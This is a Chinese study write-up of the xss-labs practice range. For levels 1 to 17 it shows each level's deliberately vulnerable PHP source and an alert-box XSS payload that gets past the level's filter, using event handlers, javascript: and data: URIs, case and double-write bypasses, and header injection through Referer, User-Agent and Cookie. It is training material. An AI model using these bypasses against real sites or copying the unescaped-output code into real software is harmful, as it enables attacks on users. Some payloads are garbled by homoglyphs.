XSS-labs学习笔记
XSS-labs学习笔记
- 什么是xss
- XSS分类
- 构造xss思路
- 靶场练习
- Level1:
- Level2:
- Level3:
- Level4:
- Level5:
- Level6:
- Level7:
- Level8:
- Level9:
- Level10:
- Level11:
- Level12:
- Level13:
- Level14:
- Level15:
- Level16:
- Level17:
- Level18:
什么是xss
xss(Cross Site Script),跨站脚本攻击
网页内嵌入HTML,CSS,JS代码
此漏洞也是网站存在相当多的漏洞,仅次于SQL注入,攻击者可以使用XSS来绕过访问控制,如同源策略。利用XSS可以窃取账号,网页挂马,发动拒绝服务攻击,发送垃圾邮件等等。
xss产生原因:
xss形成的原因与SQL注入类似,也是由于程序员在开发过程中没有对用户提交的恶意数据做过过滤,转义而直接输出到页面,导致用户可以利用此漏洞去任意构造js,html代码插入到网页源代码中并执行。
和SQL注入不同的是xss不一定要和数据库交互。
XSS分类
- 非持久性(反射型)–前端->后端->前端
- 持久性(存储型)–前端->后端->数据库->前端
- DOM型–前端
构造xss思路
主要:闭合语句
1.无任何waf 直接插入<script></script>
2.对过滤了<>
可以尝试其他的语句 如 onlick=alert(1)
3.大小写绕过 双写绕过
靶场练习
xss-labs (github上有源码,可自行下载
Level1:
php代码如下:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level2.php?keyword=test";
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
观察url栏 name=test
发现这是向服务器提交了一个name参数,值为test,从页面回显来看将name参数的值及字符长度显示在页面上;
接下来查看页面源码:
name的参数值被插入到了
h2>标签之间 so 这很关明显是考察反射性xss 由php代码中知道 对敏感字符没有过滤,所以直接在name参数中赋值一个简单的弹窗来测试一下。操作如下:
将name参数重新赋值:<script>alert('xss')</script>
出现弹窗 代表通过此关。
我们可以看到用于js弹窗的代码顺利执行了
那么这段代码在网页中如何显示的呢?
可以看到服务器是将我们的恶意代码原封不动的返回了,浏览器才能成功弹窗
可以去看看服务器端的level1.php
如何对参数操作的
从php源码可以看出,GET句将从服务器获得的name参数的值赋值给str变量,echo句又将
str变量直接插入到<h2> </h2>
标签之间,可以看出服务器并没有对name的值进行严格的管理,且这个值还是用户可以去控制的,所以存在 **反射型xss **漏洞。
漏洞描述:get型注,在url中的name字段中输入,输入的内容会在页面回显。内容是直接显示在前端html标签之间,采用标签注入。
Level2:
php代码如下:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level3.php?writing=wait";
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
继续从url入手分析 这关依旧是get方式传参,应该还是反射型xss 只不过这一关加入了输入框和搜索button
尝试一下继续用上一关的语句 <script>alert('xss')</script>
?name=
查看一下页面源代码:
可以看到 箭头处的代码被编码了 下边value后的<>都被编码成了html实体字符了。由此可以猜测存在一个 htmlspecialchars() 函数对keyword的值进行了处理。但是value中的代码没有被编码而是直接原样返回。 这里的js代码在标签属性值中,浏览器无法执行。考虑从属性值中的代码处进行突破,要想执行弹窗代码就需要先将属性的引号和标签先闭合。
So keyword赋值为:">//
左边的“>用来闭合” 右边的//注释掉原先的“>
可以看见浏览器成功弹窗了,代表着我们提交的代码被执行了
php代码中 $str 句 以get方式将keyword的参数值 赋给str变量。
echo句 中用htmlspecialchars()函数
对变量str进行处理后在网页上显示
value句 直接将变量值插入到了<input>
标签的value属性值中
也可构造 payload:123">//
漏洞描述:输入的数据,查看网页源码,内容被嵌套在表单中的value属性内,所以需要先闭合input标签,然后在注入代码,闭合标签。
Level3:
php代码如下:<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level4.php?keyword=try harder!";
}
</script>
<title>欢迎来到level3</title>
</head>
<body>
<h1 align=center>欢迎来到level3</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
先在输入框输入test尝试一下 :
发现与前几关类似 但是还不知道有没有过滤、编码等魔法
构造一个弹窗试试 ——发现报错
查看源代码:
发现<>都没了 无论是箭头处还是value处 猜测这两处都用了htmlspecialchars()
函数进行了处理
查看php代码发现 猜测正确 这里可以考虑通过 标签的一些特殊事件来执行js代码
构造代码:level3.php?keyword='onfocus=javascript:alert('xss') > //&submit=搜索
(此payload来自https://blog.csdn.net/wo41ge/article/details/107459332)
点击搜索后发现并没有弹窗出现,这是因为onfocus事件的特殊性造成的
onfocus 事件在对象获得焦点时发生。
onfocus 通常用于 , , 和.
当使用鼠标点击该输入框时 输入框被选中可以输入内容的时候 就是该输入框获得焦点的时候,此时输入框就会触发onfocus事件.
————————————————————————
也可采用事件闭合标签 playload: ' onclick='alert(1)
(漏洞描述:后端利用htmlspecialchars()函数会将特殊字符进行转义,这里无法采用标签,因为标签都是带有”<"的。但该函数不会转义单引号,可以采用事件闭合标签)
Level4:
php代码如下:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level5.php?keyword=find a way out!";
}
</script>
<title>欢迎来到level4</title>
</head>
<body>
<h1 align=center>欢迎来到level4</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level4.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>
依旧是GET方式提交参数,并且该参数值在页面上有两处显示
可以发现 输入框中的<>没有了
查看一下网页源代码
1处是直接把<>编码转换了,2处是把<>删除了
但是Level3中特殊事件的触发不需要使用<>
so 利用上一关的代码 level4.php?keyword=“οnfοcus=javascript:alert(‘xss’)”
(代码借鉴于https://blog.csdn.net/wo41ge/article/details/107459332)
点击输入框即可触发事件进行弹窗
也可构造 payload:" onclick="alert(1)
漏洞描述:输入的数据,查看网页源码,内容被嵌套在表单中的value属性内。这里只是过滤的左右尖括号,无法采用标签,闭合语句使用事件,双引号闭合
分析源码:
还是用GET方式给keyword传参赋值给str 接下来的2个语句是将变量中的<>删除 下一行是对变量进行编码后使其显示在页面上 <input句 将去除<
和>
的变量值插入到<input>
标签的value属性值中。
Level5:
php代码如下:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level6.php?keyword=break it out!";
}
</script>
<title>欢迎来到level5</title>
</head>
<body>
<h1 align=center>欢迎来到level5</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level5.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>
</body>
</html>
依旧是GET方式
再次用 测试一下
发现
第二个显示位scr后边多了一个_
查看页面源代码
1处依旧是用htmlspecialchars()
函数将<
和>
进行了编码处理
2处是在代码<script>
中添加了一个_
符号
再次用之前的代码进行测试:?keyword="οnfοcus=javascript:alert(‘xss’)>//
发现还是不行
发现on之间多了一个_ 我淦
从刚才的响应来看提交的javascript字符并没有被过滤或者转义等
所以此处既然无法通过<script>
标签或触发事件来执行js代码的话,那么可以换一个标签来执行js代码。
继续构造如下代码:?keyword="> <a href=javascript:alert('xss') > xss</a> //
从页面回显可以看到一个xss的链接 点击链接即可触发弹窗的js代码
也可构造payload:"><a href="javascript:alert(1)
漏洞描述:试探防御机制,限制了script
和on
字符---->替换成scr_pt
和o_n
,使用a标签的js伪协议实现href
属性支持javascript:
伪协议构造poc 产生一个链接
分析一波php
$str = strtolower($_GET[“keyword”]);将get方式传递到服务器端的keyword参数的值进行全小写的转换,然后赋值给str
通过str_replace()
函数来破坏变量值中的敏感字符的语义。之后通过htmlspecialchars()
函数处理显示到网页上,value句直接将进行敏感字符处理之后的变量值插入到<input>
标签的value属性值中。
Level6:
php代码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level7.php?keyword=move up!";
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level6.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>
依旧尝试
发现上边的<>依旧被编码了 下边的script中间依旧多了个 _
尝试上一关的 ****标签:?keyword="> <a href=javascript:alert(‘xss’) > xss //
发现与上一关原因一样 href中间多了一个_尝试一下大小写绕过
?keyword="> <a HrEf=javascript:alert(‘xss’) > xss //
我们这里改动的是<a>
标签中的href
属性的大小写,而在html中对大小写是不敏感的。
也可构造payload:">
漏洞描述:限制了一系列的字符 但进行判断的是整个字符串,进行大小写绕过。
————————————————————————————————
分析一波php代码:
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.
1.依旧是将get方式传递到服务器端的keyword参数的值赋值给str
2.用字符<script去匹配我们提交的参数值,如果匹配到了就进行替换来破坏原来的语义(此处能够防范的是<script>
</script>
这一类的恶意代码。)
3.用字符on去匹配参数值,如果匹配到了就进行替换破坏原有语义。(这里主要防范的是利用带有on字符的事件来触发恶意代码比如前面用到过的onfocus事件。)后边的几个语句也是这样
4.syc句得提到<img>标签了
熟悉html的人都会知道在<img>标签中引用图片会用到一个属性就是src。正常的引用图片就是将待引用图片的地址赋值给src属性。但是在js中如果src属性的值不正常或者无法访问到时就可以触发一个onerror事件来执行js代码。
标签代码:?name=<img src=111 οnerrοr=alert(‘xss’)>
5.data句 用字符data进行匹配的,同上面一样该字符在之前的演示中也没有出现过.现在一般有点XSS意识的管理员都懂得过滤javascript与script等关键字.但是对于data的认识却并不多,也就很少有对它进行过滤的.Data在我看来就是对字符进行编码的一种设定,比如如果在实际情况中javascript、script等关键字被过滤掉了之后,可以用如下语句进行尝试
data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=
这条语句和javascript:alert("xss")
或者 <script>alert("xss")</script>
的作用是一样的。
6.可以看到是用<a> </a>
标签中的字符href
来进行匹配了,防止的就是通过在href属性中插入js代码来点击执行。
Level7:
php代码如下:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level8.php?keyword=nice try!";
}
</script>
<title>欢迎来到level7</title>
</head>
<body>
<h1 align=center>欢迎来到level7</h1>
<?php
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level7.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>
先直接上测试一下
查看网页源码
发现script没了???
尝试一下双写绕过 构造payload:">alert(1)
出现弹窗
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
GET中还是用strtolower将参数值转为小写 并且替换删除了一些关键字但是只是执行了一次所以可以使用双写绕过
Level8:
php代码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level9.php?keyword=not bad!";
}
</script>
<title>欢迎来到level8</title>
</head>
<body>
<h1 align=center>欢迎来到level8</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?phpecho '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
<center><img src=level8.jpg></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>
嘿,界面变了
用test试一下?发现页面没有报错
查看一下源码
可以发现提交的参数值一个进入标签的value的属性值中,一个会插入到下方标签的href属性值中。
用尝试一下 查看网页源码
发现<>被编码了并且script中间依旧多了_
尝试事件触发测试:" οnfοcus=javascript:alert(‘xss’)>//
发现用来闭合前边“的”也被编码了 onfocus也被破坏了
尝试大小写绕过依旧失败
尝试一下对我们提交的js代码进行编码
playload:javascript:alert(1)
解码结果是:javascript:alert(1)
漏洞描述:限制了一系列的字符 大小写、双写,都无法绕过,进行Unicode编码(html实体编码)后可以绕过。
源码分析:
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
依旧对提交的参数值进行了小写转换
对关键词进行替换
str7句将用来闭合的“进行了字符实体替换。
Level9:
php代码如下:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level10.php?keyword=well done!";
}
</script>
<title>欢迎来到level9</title>
</head>
<body>
<h1 align=center>欢迎来到level9</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';}
else
{echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>
先查看一下网页源代码
发现出现了 “您的链接不合法?有没有!” 而不是提交的参数值。。。
(直接给我干懵了,这是个啥???)
看了看源码才知道原来是在level8的基础上,加入地址的检查,检查输入的数据中是否存在http://
字段。尝试一下加上http://
进行编码(还是Level8的编码
发现还是不行。。。
考虑用//将http://注释掉
payload:javascript:alert(1)//http://
哦吼,过了!
接下来分析一波源代码
前边部分还是和Level8的一样只是后边多了一句
false===strpos($str7,‘http://’)
这一段的意思是判断提交的字符里边有没有http://
如果字符中没有http://
的话就会返回false,接着在href
属性值中就会出现"您的链接不合法?有没有!"
如果有的话返回第一次出现的位置,将该字符插入到href
属性值中。
Level10:
php代码如下:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level11.php?keyword=good job!";
}
</script>
<title>欢迎来到level10</title>
</head>
<body>
<h1 align=center>欢迎来到level10</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level10.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
欸嘿?好家伙!发现没有输入框了
先查看网页源代码
???淦,孩子不会啊这里有三个标签,意味着有三个参数
尝试一下看看哪个参数可以被突破
?keyword=&t_link="type=“text”&t_history="type=“text”&t_sort="type=“text”
查看源码
发现名为t_sort的的标签里的值可以突破
尝试构造
?keyword=&t_sort="type="text"οnclick="alert(‘xss’)
成功触发弹窗
漏洞描述:页面没有提供输输入,需要在url地址栏中输入,该页面存在三个input表单,但其都是隐藏的,需要通过测试找到可以回显的表单。我们发现t_sort
变量返回在了html的value中。
其他方法:(参考dalao的博客
(1)采用html的accesskey属性( 通过键盘快捷方式触发)
t_sort=2" accesskey=“x” οnclick=“alert(1)”
不同的浏览器实现的方式不同
火狐 => alt+shift+快捷键
谷歌 => alt+x
(2)采用type属性:
t_sort=2" οnclick=“alert(1)” type=“text”
又到了分析源码环节
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
接收t_sort
参数值并且删除t_sort
参数值中的<
和>
。从这里来看的话这一关就只能是将js代码插入到<input>
标签的属性值中来执行而不能通过闭合<input>
标签引入新的标签来触发xss了。
Level11:
老规矩php代码如下:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level12.php?keyword=good job!";
}
</script>
<title>欢迎来到level11</title>
</head>
<body>
<h1 align=center>欢迎来到level11</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level11.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
这关一看就不简单
直接查看网页源代码:
发现有4个标签😥比上一关多了一个
尝试用上一关的方法:
?keyword=good job!&t_link="type="test&t_history="type="test&t_sort="type="test="type="test&t
_ref="type="test
发现名为t_sort的标签中的值发生了变化但是“被编码了,这样就无法起到闭合作用了。
那就考虑进行抓包
发现原始的请求数据包里边没有referer这个请求头,那么我们给它添上去
插入一个referer:111
发现111出现在这里(右边箭头处
所以我们可以构造payload:"type=“test” οnclick="alert(‘xss’)
可以看到我们添加的referer的值出现在了右边箭头处
接下来就可以在这里插入恶意代码了😎
点击forward放包回到浏览器点击输入框即可通关
也可以构造payload2:t_sort=2" οnclick=“alert(1)” type=“text”
接下来分析php
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
通过http头获取referer
字段的值作为t_ref
的value,将变量值中的<
和>
删除之后就会插入到t_ref
这个标签的value属性值中。利用burp抓包,http的头部加入referer字段。而上一关的
t_sort标签虽然也能接收并显示参数值,但是这个参数值是要用
htmlspecialchars()`函数处理的。
Level12:
php代码如下:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level13.php?keyword=good job!";
}
</script>
<title>欢迎来到level12</title>
</head>
<body>
<h1 align=center>欢迎来到level12</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level12.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
查看页面源码
好家伙,看起来像是抓取数据包中User-Agent
头的值
那我们就来抓一下验证验证
欸嘿,还真是。
尝试闭合前边的value再在后边插入恶意代码试试
"type=“text” οnclick="alert(‘xss’)
也可直接修改http的头部的user-agent字段
user-agent: t_sort=2" onclick="alert(1)" type="text"
接下来分析php
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center><form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua" value="'.$str33.'" type="hidden">
将keyword参数的值赋给了变量str;将t_sot
参数的值赋给了变量str00;将请求中User-Agent
头的值赋给了变量str11
;将变量str11的值中存在的<
和>
删除之后直接插入到了t_ua
标签的value属性值中。在这里变量str和str00的值都是需要被htmlspecialchars()
函数 (将<>转为实体) 处理过才能返回给浏览器。
Level13:
php代码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level14.php";
}
</script>
<title>欢迎来到level13</title>
</head>
<body>
<h1 align=center>欢迎来到level13</h1>
<?php
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level13.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
与前几关类似,还是先查看网页源码
猜测应该还是和http请求头有关
抓包看一下
可以发现这个cookie是有值的
可以看到cookie的值出现在了t_cook的值里边 尝试修改cookie
"type="text" onclick="alert('xss')
可以发现成功了,放包试试
成功了
Level14:
???直接懵了
去看了看dalao博客发现:修改iframe调用的文件来实现xss注入(但因为iframe调用的文件地址失效,无法进行测试,要考的应该是通过修改iframe调用
的文件来实现xss注入)emmm,行吧,那就跳了。。
Level15:
php代码:
<html ng-app><head><meta charset="utf-8"><script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level16.php?keyword=test";
}
</script>
<title>欢迎来到level15</title>
</head>
<h1 align=center>欢迎来到第15关,自己想个办法走出去吧!</h1>
<p align=center><img src=level15.png></p><?php
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>
照例,先看网页源代码
新奇可以看到我们提交的src值进入了标签的class属性值中,但是里边还有ng-include:这样的字符。
ng-include
是angular js
中的东西,其作用相当于php的include函数。这里就
是将1.gif
这个文件给包含进来。传送门
1、ng-include 指令用于包含外部的 HTML文件。
2、包含的内容将作为指定元素的子节点。
3、ng-include 属性的值可以是一个表达式,返回一个文件名。
4、默认情况下,包含的文件需要包含在同一个域名下。
特别值得注意的几点如下:
1.ng-include,如果单纯指定地址,必须要加引号
2.ng-include,加载外部html,script标签中的内容不执行
3.ng-include,加载外部html中含有style标签样式可以识别
发现src的地址无法访问,先将其换成国内可以访问的地址:
https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js
ng-include 指令可以用于包含外部的 HTML 文件。通过包含本地目录的其他存在xss的文件造成xss攻击,例如 包含leve1的文件
构造payload:?src=‘level1.php?name=’
因为这里参数值算是一个地址,所以需要添加引号。
但是level1.php
不是一个php文件吗?
这里解释一下这是因为我们不是单纯的去包含level1.php
,而是在后面添加了name参数值的。这就有点像是在访问了该参数值中地址之后把它响应在浏览器端的html文件给包含进来的意思。
不知道为什么payload在我这不好使(可能是没联网的问题?
Level16:
php代码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level17.php?arg01=a&arg02=b";
}
</script>
<title>欢迎来到level16</title>
</head>
<body>
<h1 align=center>欢迎来到level16</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script"," ",$str);
$str3=str_replace(" "," ",$str2);
$str4=str_replace("/"," ",$str3);
$str5=str_replace(" "," ",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src=level16.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
?>
</body>
</html>
可以看到我们提交的参数值在页面中有一处显示位
看一下网页源代码
没有什么特殊的地方,提交的参数值被插进了
用最基本的弹窗测试一下
关键字script
以及 /
和空格
都被编码成同样的空格字符实体了,这样的话就没办法去闭合前面的标签了
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script"," ",$str);
$str3=str_replace(" "," ",$str2);
$str4=str_replace("/"," ",$str3);
$str5=str_replace(" "," ",$str4);
echo "<center>".$str5."</center>";
尝试用回车来绕过,/被编码了所以我们得用一个不需要闭合的标签,比如用
<img
src=”111”
onerror=alert(‘xss’)
>
回车用%0a来表示
成功了
本关获取get参数并输出,限制大小写和双写绕过,/ 被替换,无法使用标签闭合,空格也被替换,但空格可以利用其它的url编码绕过,以此构造payload
Level17:
php代码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
}
</script>
<title>欢迎来到level17</title>
</head>
<body>
<h1 align=center>欢迎来到level17</h1>
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
<h2 align=center>成功后,<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>
</body>
</html>
挺疑惑的,就这?就这?就这??点一下直接就过了?
查看一下网页源码
发现网页上少了一个东西。有一个flash没法显示出来
我们提交的两个参数的值出现在了<embed>
标签的src属性值中,猜测该标签应该就是突破口,然后用基本的弹窗代码测试
发现<>被编码了
仔细观察一下发现这个<embed>
标签就是引入一个swf文件
到浏览器端,并且它的src属性值没有添加引号,所以不用闭合
尝试了一下onclick事件发现并不行,因为我的浏览器并没有显示出那个flash
可能是我浏览器的问题??
换个浏览器就行了。。。
也可用onmouseover事件触发onmouseover:(表示当鼠标移动到该标签上时就会触发执行某项动作)。Payload:arg01=a&arg02= onmouseover=alert(1)
这是一个flash xss注入,<embed>
